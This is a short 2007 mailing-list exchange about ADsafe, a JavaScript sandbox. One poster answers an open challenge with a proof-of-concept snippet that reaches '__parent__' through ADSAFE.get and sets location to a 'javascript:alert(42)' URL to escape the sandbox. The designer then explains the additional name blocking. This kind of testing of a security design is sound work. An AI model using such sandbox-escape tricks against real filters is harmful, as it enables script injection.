Loading ...
Sorry, an error occurred while loading the content.

Re: ADsafe, Take 2

Expand Messages
  • collin_jackson
    Not all dangerous dereferences are functions: (function() { var javascript = javascript ; javascript += :alert(42) ; ADSAFE.get({}, __parent__ ).location =
    Message 1 of 3 , Oct 1, 2007
    • 0 Attachment
      Not all dangerous dereferences are functions:

      (function() {
      var javascript = "javascript"; javascript += ":alert(42)";
      ADSAFE.get({}, "__parent__").location = javascript;
      })();

      --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
      > I am now disallowing the use of subscripting. In its place, I will be
      > providing ADSAFE.get(object, name) and ADSAFE.set(object, name,
      value)
      > that will do checking.
      >
      > You can assume the presence of those methods. They will reject
      > requests where the typeof object or value or the returned value are
      > 'function'.
      >
      > If you can get past ADsafe to alert on any one browser, then ADsafe
      is
      > broken.
    • Douglas Crockford
      ... Quite right. I should have mentioned that get and put will also block the same members that ADsafe blocks, including names starting with _.
      Message 2 of 3 , Oct 1, 2007
      • 0 Attachment
        --- In caplet@yahoogroups.com, "collin_jackson" <collinj@...> wrote:
        >
        > Not all dangerous dereferences are functions:
        >
        > (function() {
        > var javascript = "javascript"; javascript += ":alert(42)";
        > ADSAFE.get({}, "__parent__").location = javascript;
        > })();

        Quite right. I should have mentioned that get and put will also block
        the same members that ADsafe blocks, including names starting with _.
      Your message has been successfully submitted and would be delivered to recipients shortly.